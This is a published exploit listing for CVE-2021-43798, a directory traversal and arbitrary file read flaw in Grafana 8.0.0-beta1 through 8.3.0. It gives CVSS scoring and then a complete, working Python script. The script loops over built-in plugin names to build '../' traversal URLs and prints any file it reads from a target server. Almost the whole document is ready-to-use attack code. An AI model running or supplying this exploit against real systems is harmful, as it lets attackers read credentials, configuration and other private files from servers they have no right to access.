Grafana 8.3.0 Directory Traversal / Arbitrary File Read

2021-12-0900:00:00

s1gh

packetstormsecurity.com

570

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

JSON

`# Exploit Title: Grafana 8.3.0 - Directory Traversal and Arbitrary File Read  
# Date: 08/12/2021  
# Exploit Author: s1gh  
# Vendor Homepage: https://grafana.com/  
# Vulnerability Details: https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p  
# Version: V8.0.0-beta1 through V8.3.0  
# Description: Grafana versions 8.0.0-beta1 through 8.3.0 is vulnerable to directory traversal, allowing access to local files.  
# CVE: CVE-2021-43798  
# Tested on: Debian 10  
# References: https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p47p  
  
#!/usr/bin/env python3  
# -*- coding: utf-8 -*-  
  
import requests  
import argparse  
import sys  
from random import choice  
  
plugin_list = [  
"alertlist",  
"annolist",  
"barchart",  
"bargauge",  
"candlestick",  
"cloudwatch",  
"dashlist",  
"elasticsearch",  
"gauge",  
"geomap",  
"gettingstarted",  
"grafana-azure-monitor-datasource",  
"graph",  
"heatmap",  
"histogram",  
"influxdb",  
"jaeger",  
"logs",  
"loki",  
"mssql",  
"mysql",  
"news",  
"nodeGraph",  
"opentsdb",  
"piechart",  
"pluginlist",  
"postgres",  
"prometheus",  
"stackdriver",  
"stat",  
"state-timeline",  
"status-histor",  
"table",  
"table-old",  
"tempo",  
"testdata",  
"text",  
"timeseries",  
"welcome",  
"zipkin"  
]  
  
def exploit(args):  
s = requests.Session()  
headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.' }  
  
while True:  
file_to_read = input('Read file > ')  
  
try:  
url = args.host + '/public/plugins/' + choice(plugin_list) + '/../../../../../../../../../../../../..' + file_to_read  
req = requests.Request(method='GET', url=url, headers=headers)  
prep = req.prepare()  
prep.url = url  
r = s.send(prep, verify=False, timeout=3)  
  
if 'Plugin file not found' in r.text:  
print('[-] File not found\n')  
else:  
if r.status_code == 200:  
print(r.text)  
else:  
print('[-] Something went wrong.')  
return  
except requests.exceptions.ConnectTimeout:  
print('[-] Request timed out. Please check your host settings.\n')  
return  
except Exception:  
pass  
  
def main():  
parser = argparse.ArgumentParser(description="Grafana V8.0.0-beta1 - 8.3.0 - Directory Traversal and Arbitrary File Read")  
parser.add_argument('-H',dest='host',required=True, help="Target host")  
args = parser.parse_args()  
  
try:  
exploit(args)  
except KeyboardInterrupt:  
return  
  
  
if __name__ == '__main__':  
main()  
sys.exit(0)  
  
`